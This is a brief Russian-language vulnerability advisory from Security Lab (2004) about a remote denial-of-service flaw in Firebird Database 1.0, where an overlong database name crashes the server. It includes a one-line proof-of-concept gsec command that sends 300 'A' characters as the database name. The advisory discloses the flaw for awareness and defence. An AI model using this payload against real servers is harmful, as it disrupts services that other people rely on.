Security Lab

Удаленный отказ в обслуживании целевого сервера в Firebird

Дата публикации:02.06.2004
Всего просмотров:1397
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Firebird Database 1.0

Описание: Уязвимость обнаружена в базе данных Firebird в обработке имен базы данных. Удаленный пользователь может аварийно завершить работу целевого сервера.

Удаленный пользователь может подключится к базе данных и послать специально сформированное имя базы данных, чтобы аварийно завершить работу целевой базы данных. Пример:

gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

URL производителя: http://firebird.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Firebird Database Remote Database Name Overflow